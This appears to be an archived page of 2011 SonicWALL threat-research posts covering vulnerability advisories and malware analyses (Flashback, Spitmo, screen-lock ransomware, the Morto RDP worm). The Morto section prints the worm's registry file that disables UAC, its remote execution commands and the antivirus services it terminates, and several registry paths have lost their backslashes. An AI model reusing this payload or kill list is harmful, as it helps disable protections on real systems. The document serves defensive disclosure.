Apache HTTPD mod_proxy_ajp DoS (Sep 30, 2011)

/in /by

The Apache HTTP server is the most popular web server used on the Internet. The server comes bundled with optional plug-in modules which are loaded at run-time to extend its functionality. Two technologies supported by the Apache HTTP server are the Apache JServ Protocol (AJP) and httpd based load balancing.

AJP is a binary protocol which routes requests from a web server to application servers. This is done by using a routing scheme where each application server is given a name, known as its ‘route’. This setup is usually used in high demand environments where clusters of servers are implemented. It is implemented through the module mod_proxy_ajp. Although load balancing can be performed with this protocol, the module mod_cluster can be used in addition to mod_proxy_ajp to provide additional load balancing capabilities. While mod_proxy_ajp creates channels between the web servers and the application servers, mod_cluster creates channels between the application servers and the web server to provide more detailed information about the server state. This allows the proxy to dynamically configure httpd workers based on the application server environment.

Typically, an HTTP request is receieved by the web server which is then forwarded to the appropriate backend server based on the load balancer’s information. HTTP requests include a request line and various headers. The Request-Line begins with a method token, followed by the Request-URI, the protocol version, and CRLF. An example of an HTTP request line follows: 

 GET /test.html HTTP/1.1 Host: www.test.com

A denial of service vulnerability exists in the mod_proxy_ajp module. The vulnerability is due to insufficient validation of HTTP requests. The vulnerable code does not properly handle some HTTP methods. When a malicious request is processed by the code, it returns an HTTP_INTERNAL_SERVER_ERROR which puts the proxy workers into an error state. At this point, the workers are unable to accept any connections, resulting in a denial of service condition. An unauthenticated, remote attacker can exploit this vulnerability by sending an HTTP request with an invalid method. Exploitation of this flaw results in a temporary denial of service condition.

SonicWALL has released two IPS signatures to address this issue. The following signature have been released:

  • 2063 – Apache mod_proxy_ajp DoS 2
  • 2065 – Apache mod_proxy_ajp DoS 2

This vulnerability has been assigned the id CVE-2011-3348 by mitre.
The vendor has released an advisory addressing this flaw.

MAC OSX Flashback Backdoor Trojan (Sep 29, 2011)

/in /by

SonicWALL UTM Research team received reports of a new MAC OSX Flashback Trojan spreading in the wild by masquerading as a Adobe flash player 11 installer. Once installed it proceeds to install a backdoor on the system, contacts a remote server to report infection and awaits further instructions.

The fake installer is automatically executed when downloaded through Safari. The user is then led through the following installation screens:

screenshot

screenshot

It performs the following activities when installed:

  • It drops the following files:
    • ~/Library/Preferences/Preferences.dylib
    • ~/.MacOSX/environment.plist
    • /tmp/AdobeUpdate/FlashPlayer.txt
  • The preinstall script removes the downloaded “FlashPlayer-11-macos.pkg” file once installation is completed.
  • It checks for presence of “Little Snitch” security software by querying for “/Library/Little Snitch/lsd” and disables it.
  • It modifies the “DYLD_INSERT_LIBRARIES” environment variable for “launchd” to point to “~/Library/Preferences/Preferences.dylib”. This ensures malicious Preferences.dylib is loaded when certain applications/daemons are launched.
  • It reports infection to remote server. 
      screenshot
  • The user agent used when reporting to the remote server is combination of kernel variables “hw.machine” and “kern.osrelease” read from the infected system.

We advice users to only download software from trusted sources. We also recommend disabling “Open safe files after downloading” feature in Safari which will prevent this Trojan installer from automatically launching on download. This feature can be unchecked in Safari->Preferences->General: 

screenshot

SonicWALL Gateway AntiVirus provides protection against this threat with the following signature:

  • GAV: GAV: OSX.Flashback.A (Trojan)

    • Microsoft SharePoint XML File Disclosure (Sept 23, 2011)

    /in /by

    Microsoft SharePoint Server is an ASP.NET product intended for collaboration, file sharing, web publishing and other social networking functions. The server runs on the Microsoft IIS web server. SharePoint farms host web sites, intranets, extranets, as well as provide a framework for web application development. SharePoint also allows creation of ASP.NET controls known as Web Parts or Web Widgets to enhance the functionality of a particular SharePoint page. These controls allow end users to modify various aspects of the web page from their web browser. One of these widgets included in the SharePoint package is the XML Viewer. The XML Viewer has the ability to display and apply XSLT to XML documents. An example SharePoint page is shown which can be added to an XML Viewer widget: 

          
    test

    XML defines entities which are symbolic representations of a block of information. Entities can be either external or internal. Internal entities are defined and used inside the XML file. External entities exist in an external source like a file and require the SYSTEM identifier in order to be imported and used. An example of an external entity definition is shown:

    In the above example, the external resource identifier is a URI. Most of the time, its a simple file name.

    An information disclosure vulnerability exists in Microsoft SharePoint. It is due to an error while parsing XML files which use external entities. The vulnerable code allows a user to specify an arbitrary file and path of the external resource. This can allow a user to create an XML Viewer Web Part which discloses the contents of arbitrary files within the SharePoint server scope. In order to exploit this flaw, an attacker must first be successfully authenticated by the target SharePoint server.

    SonicWALL has released two IPS signatures to address this vulnerability. The signatures detect and block generic attack attempts targetting this flaw.

    • 1856 – SharePoint Remote File Disclosure 1
    • 1003 – SharePoint Remote File Disclosure 2

    The vulnerability has been assigned CVE-2011-1892 by mitre.
    The vendor has released an advisory (ms11-074) addressing this issue.

    Fake AV spreading via Skype VOIP calls (Sep 20, 2011)

    /in /by

    The Sonicwall UTM research team received reports of an increase in the number of unsolicited Skype calls trying to spread Fake AV.

    Fake AV authors are using Skype VOIP calls to lure unsuspecting users into visiting Fake AV landing site. We first received report of this tactic earlier this year in April 2011 and there has been a rise in these automated calls with prerecorded messages since then. Below is the screenshot of a most recent call received by one of our researchers:

    There is a pre-recorded message that loops multiple times before the call ends:

      Attention: This is an automated computer system alert.
      Your computer protection service is not active.
      To activate computer protection, and repair your computer, go to www.sos(REMOVED).com

    If the user opens the website then he will see the usual Fake AV scare-ware animations claiming to scan the computer and find multiple threats:

    It finally prompts the user to buy the protection service to fix the errors:

    They are using Click2Sell.eu, a European affiliate marketing company, as the payment gateway. This is an interesting new scare-ware tactic where Fake AV authors are:

    • Using Skype VOIP calls to spread.
    • Luring users straight to the payment gateway for computer protection without downloading any scare-ware onto the user system and hence bypassing AV file detection.
    • Instead of traditional one-time payment for the Fake AV they are making the user sign-up for a monthly subscription of 19.95 USD.

    In order to avoid such scam tactics, Skype users are advised to change their Privacy settings for calls to only allow calls from their contacts:

    Additionally, SonicWALL customers can utilize Application Control service to prevent this threat by blocking Skype calls on their network.

    Microsoft Security Bulletins Coverage (Sept 13, 2011)

    /in /by

    SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of September, 2011. A list of issues reported, along with SonicWALL coverage information follows:

    MS11-070 Vulnerability in WINS Could Allow Elevation of Privilege (2571621)

    • CVE-2011-1984 WINS Local Elevation of Privilege Vulnerability
      Local vulnerability.

    MS11-071 Vulnerability in Windows Components Could Allow Remote Code Execution (2570947)

    • CVE-2011-1991 Windows Components Insecure Library Loading Vulnerability
      IPS: 5726 – Possible Binary Planting Attempt

    MS11-072 Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2587505)

    • CVE-2011-1986 Excel Use after Free WriteAV Vulnerability
      GAV: Malformed.xls.MP.2
    • CVE-2011-1987 Excel Out of Bounds Array Indexing Vulnerability
      GAV: Malformed.xls.MP.3
    • CVE-2011-1988 Excel Heap Corruption Vulnerability
      GAV: Malformed.xls.MP.4, Malformed.xls.MP.5, Malformed.xls.MP.6
    • CVE-2011-1989 Excel Conditional Expression Parsing Vulnerability
      GAV: Malformed.xls.MP.7
    • CVE-2011-1990 Excel Out of Bounds Array Indexing Vulnerability
      GAV: Malformed.xls.MP.8

    MS11-073 Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2587634)

    • CVE-2011-1980 Office Component Insecure Library Loading Vulnerability
      IPS: 5726 Possible Binary Planting Attempt
    • CVE-2011-1982 Office Uninitialized Object Pointer Vulnerability
      GAV: Malformed.doc.MP.3

    MS11-074 Vulnerabilities in Microsoft SharePoint Could Allow Elevation of Privilege (2451858)

    • CVE-2011-0653 XSS in SharePoint Calendar Vulnerability
      IPS: 6753 – Generic Cross-Site Scripting (XSS) Attempt 8
    • CVE-2011-1252 HTML Sanitization Vulnerability
      IPS: 6797 MS IE toStaticHTML XSS 3
    • CVE-2011-1890 Editform Script Injection Vulnerability
      IPS: 1868 Generic Cross-Site Scripting (XSS) Attempt 21
    • CVE-2011-1891 Contact Details Reflected XSS Vulnerability
      IPS: 1849 Generic Cross-Site Scripting (XSS) Attempt 20
    • CVE-2011-1892 SharePoint Remote File Disclosure Vulnerability
      IPS: 1856 SharePoint Remote File Disclosure
    • CVE-2011-1893 SharePoint XSS Vulnerability
      IPS: 1369 Generic Cross-Site Scripting (XSS) Attempt 1, 6752 Generic Cross-Site Scripting (XSS) Attempt 7

    SpyEye targets android devices with Spitmo.A (Sep 13, 2011)

    /in /by

    SonicWALL UTM Research team received reports of a new SpyEye banking Trojan variant targeting the android platform. This variant uses MitB(Man-in-the-Browser) techniques when visiting banking websites in order to direct the user to download an android application. The android application is professed to generate the authentication code required to login to the banking website but once installed, it intercepts and uploads your messages to a remote server in the background.

    When the rogue application is downloaded and the installer is launched, it requests for the following permissions:

    screenshot

    It performs the following activities when installed:

    • Once installed, it does not show up on the devices list of installed applications but runs silently in the background as “System”: 
        screenshot
    • It displays a fake authentication code for logging in to the banking website when a call is placed to “325000”: 
        screenshot
    • It displays the fake code on the home screen as seen below: 
        screenshot
    • It contacts the following domains which are no longer active: 
        screenshot
    • The remote URLs are hidden in the “Settings.xml” file of the android application: 
        screenshot
    • It intercepts messages and constructs data to be sent to a remote server: 
        screenshot
        

        

        screenshot
    • It uploads intercepted messages to a remote server 
        screenshot

    SonicWALL Gateway AntiVirus provides protection against this threat with the following signature:

  • GAV: AndroidOS.Spitmo.A (Trojan)

    • New Screen Lock Ransomware poses as Microsoft License Manager (Sept 9, 2011)

    /in /by

    The Sonicwall UTM research team received reports of a new Ransom Malware in the wild. Malware of this nature holds a compromised machine hostage until payment is made. This software pretends to come from Microsoft and claims that the license used on the compromised system is not authentic. As a result the user is encouraged to buy a “license” from the creators of the Trojan. The user is forced to do this from another machine as the desktop is locked.

    Upon execution, the Trojan will immediately reboot the system. On reboot, the following screen will be displayed:

    There is no conventional way of exiting the screen other than to follow the malicious instructions for obtaining a license from www.buylicens.com for 50 Euros.

    The following screenshot is from www.buylicens.com and has been partially translated to from german to english:

    The Trojan performs the following DNS query:

    • lic{removed}.cz.cc (This site is currently down)

    The Trojan creates the following files on the filesystem:

    • C:Documents and Settings{USER}Start MenuProgramsStartupmsvcs.exe [Detected as GAV: Ransom.A_2 (Trojan)]

      • (This is a copy of the original executable that was run)

    The Trojan creates the following keys in the Windows registry:

      Enable startup:

    • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “C:Documents and Settings{USER}Application Data9A52917-B4FC-4f02-AE3B-BF55D9351F4Amsvcs.exe”
    • HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinLogon “C:WINDOWSsystem32userinit.exe,C:Documents and Settings{USER}Application Data9A52917-B4FC-4f02-AE3B-BF55D9351F4Amsvcs.exe”

    The Trojan injects code into a Firefox browser process. If Firefox is not present on the system it falls back to using Internet Explorer. It causes the following network conversation with a remote host:

    During analysis it was discovered that the Trojan exectuble file contains the unlock key (QRT5T 5FJQE 53BGX T9HHJ W53YT) in plain text. This key appears to remove the Trojan:

    SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

    • GAV: Ransom.A_2 (Trojan)

    Broadwin WebAccess Client Format String Attack (Sept 8, 2011)

    /in /by

    Supervisory Control and Data Acquisition (SCADA), generally refers to industrial control systems: computer systems that monitor and control industrial, infrastructure, or facility-based processes. A SCADA system usually consists of the following subsystems: a human-machine interface or HMI, a supervisory (computer) system, remote terminal units (RTUs) connecting to sensors in the process, Programmable logic controller (PLCs) used as field devices and communication infrastructure. Broadwin Technology is one of the vendors that manufacture SCADA systems. Browser-based Human-Machine Interface (HMI) and Supervisory Control and Data Acquisition (SCADA) software are two of their main products.

    Broadwin’s WebAccess is the client component of their SCADA system. It provides an ActiveX component designed to run in an Internet Explorer (IE) session. The ActiveX control is associated with CLSID “5C2A52BD-2250-4F6B-A4D2-D1D00FCD748C”, and ProgID “BWOCXRUN.BwocxrunCtrl.1”. It can be instantiated in a web page using the tag or via scripting. The following example demonstrate how this ActiveX control can be instantiated:

    

    A format string code execution vulnerability exists in the Broadwin Technology’s WebAccess client ActiveX component nbwocxrun.ocx. The vulnerability is due to insufficient input validation when handling one of the parameters in calls to the BWOCXRUN.BwocxrunCtrl.1 method. A remote unauthenticated attacker can exploit this vulnerability by enticing a target client to view a crafted HTML document, ASP page, or various other media. Successful exploitation could result in execution of arbitrary code within the security context of the target user.
    

    SonicWALL UTM team has researched this vulnerability and created the following IPS signature to prevent/detect attacks addressing this vulnerability.
    

      

    • 1801 Broadwin WebAccess Client Format String Attack
      • 

    

    This vulnerability has not been assigned with an ID by CVE.
    

    	Apache Range Header Processing DoS (Sep 1, 2011)				
    /in  /by 
    The Apache HTTP server is the most popular HTTP server software in use. It supports a variety of features, many implemented as compiled modules which extend the core functionality.
    

      The Range header in HTTP/1.1 is used to request part of an entity; it improves efficiency when recovering from failed or incomplete transfers. The Range header may specify a single range of bytes, or a set of ranges within a single entity.
    

      A memory exhaustion vulnerability exists in Apache HTTP Server. Specifically, the vulnerability happens when processing a Range header that expresses multiple overlapping ranges. A remote attacker could exploit this vulnerability by sending a series of crafted HTTP requests to the target server. Successful exploitation would exhaust available memory of the target server and cause a denial-of-service condition.
    

      The vulnerability has been assigned as CVE-2011-3192.
    

      SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:
    

    

      

    • 6905 Apache HTTP Range Header DOS Attempt
      • 

    

    	RDP Worm Morto.A (Aug. 31, 2011)				
    /in  /by 
    SonicWALL UTM Research team received reports of a new internet worm propagating in the wild. This worm targets Remote Desktop Protocol (RDP) and has the capability to download additional malicious components, terminate Antivirus related security processes and services,  perform Denial-of-Service attack (DDOS) and can be remotely controlled from a malicious server. 
    

      Process of Infection:
    

     This worm targets machines via Remote Desktop Protocol (RDP) by compromising weak administrator passwords. Once a system is infected, it will scan the local network for RDP connections through port 3389. It uses a set of usernames and passwords to gain access to these RDP machines and infects them.  
    

    	 Installation:
    

     This worm has three components: Main executable, DLL loader, and the payload. 
    

     Main Executable
    

     The main executable drops the DLL loader ntshrui.dll on %windir%/temp directory and copies it as clb.dll on %windir% directory.   
    

     It adds the following registry entries as part of its installation: 
    

      

    • HKLMSYSTEMWpait
      • 

    • HKLMSYSTEMWpaid
      • 

    • HKLMSYSTEMWpaie
      • 

    • HKLMSYSTEMWpasr
      • 

    • HKLMSYSTEMWpasn
      • 

    • HKLMSYSTEMWpamd
      • 

    

     It then deletes the following registry to remove its tracks: 
    

      

    • HKCU “SoftwareMicrosoftWindowsCurrentVersionExplorerRunMRU”
      • 

    

     The DLL loader clb.dll located at %windir% directory is loaded once the malware spawns the process Registry Editor (regedit.exe). 
    

     There is a legitimate DLL file clb.dll located in %windir%/system32 directory that regedit.exe actually uses. But because of the design of how windows loads files, wherein it will look for them at %windir% directory first before looking at %windir%/system32, the malware component clb.dll will in effect be loaded instead of the legitimate one. 
    

     DLL Loader
    

     After getting loaded by the process regedit, it will decrypt the payload DLL and loads it to memory. It will also perform the following activities: 
    

       Added Registry: 
      

       Key: HKLMSYSTEMCurrentControlSetControlWindows
       Value: “NoPopUpsOnBoot”
       Data: “1” 
      

       Key: HKLMSYSTEMCurrentControlSetServices6to4Parameters
       Value: “ServiceDll”
       Data: “%windir%temp ntshrui.dll” 
      

       Modified Registry:
      

       Key: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSENSParameters
       Value: ServiceDll
       Data Before: %SystemRoot%system32sens.dll Data After: %SystemRoot%system32sens32.dll 
      

       Added Files: 
      

       %windir%offline web pages{Current Date}
       %windir%offline web pages1.40_testDdos
       %windir%offline web pagescache.txt – blocked as [ GAV: Morto.A_2 (Trojan) ] %windir%system32sens32.dll  – blocked as [ GAV: Morto.A_2 (Trojan) ] 
    

     DLL Payload 
    

     The malware attempts to connect to RDP servers on local network through port 3389 using administrator accounts. Some of the accounts are shown below:
    

     screenshot	 
    

     It will copy the following files on the RDP workstations through \tsclienta. 
    

      

    • \tsclientaa.dll – blocked as [ GAV: Morto.A_2 (Trojan) ]
      • 

    • \tsclientar.reg
      • 

    

     Contents of the file r.reg is shown below which ensures rundll32.exe will run the malware with administrator privileges and without prompting for user for permission for any system changes: 
    

      [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem] 		
      “ConsentPromptBehaviorAdmin”=dword:0 		
      “EnableLUA”=dword:0 		
      
[HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCuurrentVersionAppCompatFlagsLayers] 		
      “c:\windows\system32\rundll32.exe”=”RUNASADMIN” 		
      “d:\windows\system32\rundll32.exe”=”RUNASADMIN” 		
      “e:\windows\system32\rundll32.exe”=”RUNASADMIN” 		
      “f:\windows\system32\rundll32.exe”=”RUNASADMIN” 		
      “g:\windows\system32\rundll32.exe”=”RUNASADMIN” 		
      “h:\windows\system32\rundll32.exe”=”RUNASADMIN” 		
      “i:\windows\system32\rundll32.exe”=”RUNASADMIN” 		
      

      “c:\windows\SysWOW64\rundll32.exe”=”RUNASADMIN” 		
      “d:\windows\SysWOW64\rundll32.exe”=”RUNASADMIN” 		
      “e:\windows\SysWOW64\rundll32.exe”=”RUNASADMIN” 		
      “f:\windows\SysWOW64\rundll32.exe”=”RUNASADMIN” 		
      “g:\windows\SysWOW64\rundll32.exe”=”RUNASADMIN” 		
      “h:\windows\SysWOW64\rundll32.exe”=”RUNASADMIN” 		
      “i:\windows\SysWOW64\rundll32.exe”=”RUNASADMIN” 		
      

      “c:\winnt\system32\rundll32.exe”=”RUNASADMIN” 		
      “c:\win2008\system32\rundll32.exe”=”RUNASADMIN” 		
      “c:\win2k8\system32\rundll32.exe”=”RUNASADMIN” 		
      “c:\win7\system32\rundll32.exe”=”RUNASADMIN” 		
      “c:\windows7\system32\rundll32.exe”=”RUNASADMIN” 
    

     Once files have been copied to RDP workstations, the malware will run those with the following commands: 
    

      

    • “regedit /s \tsclientar.reg”
      • 

    • “rundll32 \tsclientaa.dll a”
      • 

    

     It also terminates the following services related to AV security softwares: 
    

      

    • 360rp
      • 

    • a2service
      • 

    • ACAAS
      • 

    • ArcaConfSV
      • 

    • AvastSvc
      • 

    • avguard 
      • 

    • avgwdsvc
      • 

    • avp
      • 

    • avpmapp
      • 

    • ccSvcHst    
      • 

    • cmdagent
      • 

    • coreService
      • 

    • FortiScand
      • 

    • FPAVServer
      • 

    • freshclam
      • 

    • fsdfwd  
      • 

    • GDFwSvc
      • 

    • K7RTScan
      • 

    • knsdave
      • 

    • KVSrvXP
      • 

    • kxescore
      • 

    • mcshield
      • 

    • MPSvc
      • 

    • MsMpEng
      • 

    • NSESVC.EXE
      • 

    • PavFnSvr
      • 

    • RavMonD
      • 

    • SavService
      • 

    • scanwscs
      • 

    • Shell
      • 

    • SpySweeper
      • 

    • Vba32Ldr
      • 

    • vsserv
      • 

    • zhudongfangyu
      • 

    

     Network Activities:
    

     The malware tries to contact the following URLs: 
    

      

    • qf{REMOVED}.net
      • 

    • ms.ji{REMOVED}nfo
      • 

    • ms.ji{REMOVED}o.cc
      • 

    • ms.ji{REMOVED}o.be
      • 

    

     SonicWALL Gateway AntiVirus provides protection against this worm via the following signatures: 
    

     GAV: Morto.A (Worm)
     GAV: Morto.A_2 (Trojan) 
    

     screenshot	
    

    

    
				
				

				
			

		




						

	


			

			
				


					
		
		
		






				

    
					
    
						
    Pin It on Pinterest